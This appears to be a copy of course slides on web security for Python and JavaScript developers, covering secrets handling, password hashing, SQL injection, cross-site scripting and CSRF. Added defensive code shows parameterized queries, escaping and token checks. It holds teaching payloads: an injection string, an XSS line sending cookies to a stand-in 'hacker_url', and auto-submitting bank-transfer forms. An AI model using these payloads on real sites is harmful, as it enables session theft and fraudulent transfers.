Web Programming: Python & JavaScript Guide

This document provides an overview of topics related to web programming with Python and JavaScript. It covers fundamentals like HTML, Flask, APIs, and SQL, as well as more advanced topics such as Git, JavaScript, Django, security concepts like authentication and cryptography, testing, and deploying websites. The document also discusses scaling applications and attacks like denial of service.

Uploaded by

Moudi Mouhamadou
  • Web Programming with Python and JavaScript: Introduces the context and scope of using Python and JavaScript in web programming.
  • Security: Covers the basics of security principles important for web development.
  • Topics: Lists the different topics that will be covered in the course, such as Git, HTML, and Flask.
  • Git: An introduction to using Git for version control in development projects.
  • Open-Source Software: Discusses the role and importance of open-source software in web programming.
  • Two-Factor Authentication: Details the implementation and benefits of using two-factor authentication for security.
  • First Commit: Visual representation of the process and importance of making the initial commit in version control.
  • HTML: Explores the basics of HTML for structuring web pages.
  • Flask: Introduces Flask as a framework for building web applications in Python.
  • HTTP and HTTPS: Explains the protocols HTTP and HTTPS and their roles in secure web communication.
  • Cryptography: Discusses fundamental concepts of cryptography in securing data transmission.
  • Environment Variables: Shows how to use environment variables to manage application settings securely.
  • SQL: Introduction to SQL for database management and interaction.
  • APIs: Introduction to APIs and their significance in enabling communication between different software systems.
  • JavaScript: Covers the basics of JavaScript for building interactive web pages.
  • Django: Presents Django as a high-level Python web framework for rapid development.
  • Testing, CI/CD: Discusses testing and continuous integration/continuous deployment (CI/CD) practices for maintaining code quality.
  • Scalability: Explores strategies for ensuring web applications can scale effectively.
  • Other Web Frameworks: Introduces additional web frameworks beyond Flask and Django for both server-side and client-side development.
  • Deploying Websites: Details various platforms and services for deploying websites efficiently.

Web Programming

with Python and JavaScript


Security
Topics
• Git
• HTML
• Flask
• SQL
• APIs
• JavaScript
• Django
• CI/CD
• Scalability
• ...
Git
Open-Source Software
Two-Factor Authentication
[Diagram: first commit → credentials exposed → credentials removed]
HTML
<a href="url1">
url2
</a>
Flask
HTTP and HTTPS
Cryptography
Secret-Key Cryptography
[Diagram: Plaintext + Key → Ciphertext; Ciphertext + Key → Plaintext]
Public-Key Cryptography
[Diagram: Plaintext + Public Key → Ciphertext; Ciphertext + Private Key → Plaintext]
Environment Variables
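# Hard-coded secret: anyone who can read the source or its history can read the key
app.config["SECRET_KEY"] = "dHdlbnR5ZWlnaHQ"
# Read the key from the environment instead (requires "import os")
app.config["SECRET_KEY"] = os.environ.get("SECRET_KEY")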
SQL
users
id  username   password
1   anushree   hello
2   elle       password
3   rodrigo    12345
4   sebastian  abcdef
5   jessica    qwerty

users
id  username   password
1   anushree   48c8e8c3f9e80b68ac67304c7c510e9fcb
2   elle       6024aba15e3f9be95e3c9e6d3bf261d78e
3   rodrigo    90112701066c0a536f2f6b2761e5edb09e
4   sebastian  b053b7574c8a25751e2a896377e5d477c5
5   jessica    a4048eaaee50680532845b2025996b44a9
SQL Injection
Username:
Password:
SELECT * FROM users
WHERE (username = username)
AND (password = password);

Username: alice
Password: hello
SELECT * FROM users
WHERE (username = 'alice')
AND (password = 'hello');

Username: alice
Password: 1' OR '1' = '1
SELECT * FROM users
WHERE (username = 'alice')
AND (password = '1' OR '1' = '1');
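The login query above, built by string substitution and then with bound parameters, run against an in-memory SQLite database. This is an added example, not code from the slides; the table contents are constructed and the function names are hypothetical.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows (plaintext, as in the first table)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "hello"), ("elle", "password")],
    )
    return db

def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the statement by pasting the form fields into the SQL text."""
    query = (
        "SELECT * FROM users "
        f"WHERE (username = '{username}') AND (password = '{password}');"
    )
    return db.execute(query).fetchone() is not None

def login_parameterized(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Sends SQL text and values separately, so input is never parsed as SQL."""
    query = "SELECT * FROM users WHERE (username = ?) AND (password = ?);"
    return db.execute(query, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    crafted = "1' OR '1' = '1"  # the password field value shown on the slide
    print("vulnerable   :", login_vulnerable(db, "alice", crafted))
    print("parameterized:", login_parameterized(db, "alice", crafted))
```

With the parameterized version the crafted value is compared as a literal password string and matches no row.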
APIs
API Keys
• Rate Limiting
• Route Authentication
JavaScript
Cross-Site Scripting
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def index():
    return "Hello, world!"

# Echoes request.path into the response without escaping
@app.errorhandler(404)
def page_not_found(e):
    return "Not Found: " + request.path

/foo

/<script>alert('hi')</script>

/<script>document.write(
'<img src="hacker_url?cookie="
+document.cookie+">")</script>
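The 404 handler's string concatenation next to an escaped version, checked by feeding each response body to an HTML parser and listing the elements it creates. This is an added example using only the Python standard library, not code from the slides; the function names are hypothetical.

```python
from html import escape
from html.parser import HTMLParser

def not_found_unsafe(path: str) -> str:
    """Same string concatenation as the slide's 404 handler."""
    return "Not Found: " + path

def not_found_escaped(path: str) -> str:
    """Encode <, >, & and quotes so the path is rendered as text, not markup."""
    return "Not Found: " + escape(path, quote=True)

class TagCollector(HTMLParser):
    """Records every element an HTML parser would create from the response."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(body: str) -> list:
    """Return the names of all elements found in a response body."""
    collector = TagCollector()
    collector.feed(body)
    collector.close()
    return collector.tags

# Request paths taken from the slides above.
PATHS = ["/foo", "/<script>alert('hi')</script>"]

if __name__ == "__main__":
    for p in PATHS:
        print(p, tags_in(not_found_unsafe(p)), tags_in(not_found_escaped(p)))
```

In a Flask application the same encoding is available as markupsafe.escape, and Jinja templates rendered through render_template escape variables by default.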
Django
Cross-Site Request Forgery
<body>
<a href="http://yourbank.com/transfer?to=brian&amt=2800">
Click Here!
</a>
</body>
<body>
<img src="http://yourbank.com/transfer?to=brian&amt=2800">
</body>
<body>
<form action="https://yourbank.com/transfer"
method="post">
<input type="hidden" name="to" value="brian">
<input type="hidden" name="amt" value="2800">
<input type="submit" value="Click Here!">
</form>
</body>
<body onload="document.forms[0].submit()">
<form action="https://yourbank.com/transfer"
method="post">
<input type="hidden" name="to" value="brian">
<input type="hidden" name="amt" value="2800">
<input type="submit" value="Click Here!">
</form>
</body>
<form action="/transfer" method="post">
{% csrf_token %}
<input name="to" value="brian">
<input name="amt" value="2800">
<input type="submit" value="Transfer">
</form>
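What a token such as the one inserted by {% csrf_token %} buys: the server binds a random value to the user's session, embeds it in its own form, and refuses any POST that does not return it. This is an added, simplified sketch of that check, not Django's implementation and not code from the slides; the session store, the field name csrf_token and the function names are hypothetical.

```python
import hmac
import secrets

SESSIONS = {}  # session id -> CSRF token (hypothetical in-memory session store)

def new_session() -> str:
    """Create a session and bind a fresh random CSRF token to it."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = secrets.token_urlsafe(32)
    return session_id

def render_transfer_form(session_id: str) -> str:
    """The site's own form carries the session's token as a hidden field."""
    token = SESSIONS[session_id]
    return (
        '<form action="/transfer" method="post">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amt">'
        '<input type="submit" value="Transfer"></form>'
    )

def handle_transfer(session_id: str, form: dict) -> str:
    """Reject any POST whose token does not match the one bound to the session."""
    expected = SESSIONS.get(session_id)
    supplied = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 Forbidden"
    return f"200 OK: sent {form['amt']} to {form['to']}"

if __name__ == "__main__":
    sid = new_session()
    # A form hosted on another site can set "to" and "amt" but cannot read the token.
    print(handle_transfer(sid, {"to": "brian", "amt": "2800"}))
    print(handle_transfer(sid, {"to": "brian", "amt": "2800", "csrf_token": SESSIONS[sid]}))
```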
Testing, CI/CD
Scalability
DoS Attacks
DDoS Attacks
What's next?
Other Web Frameworks
• Server-Side
• Express.js
• Ruby on Rails
• ...
• Client-Side
• AngularJS
• React
• Vue.js
• ...
Deploying Websites

• Amazon Web Services


• GitHub Pages
• Google Cloud
• Heroku
• Microsoft Azure
• ...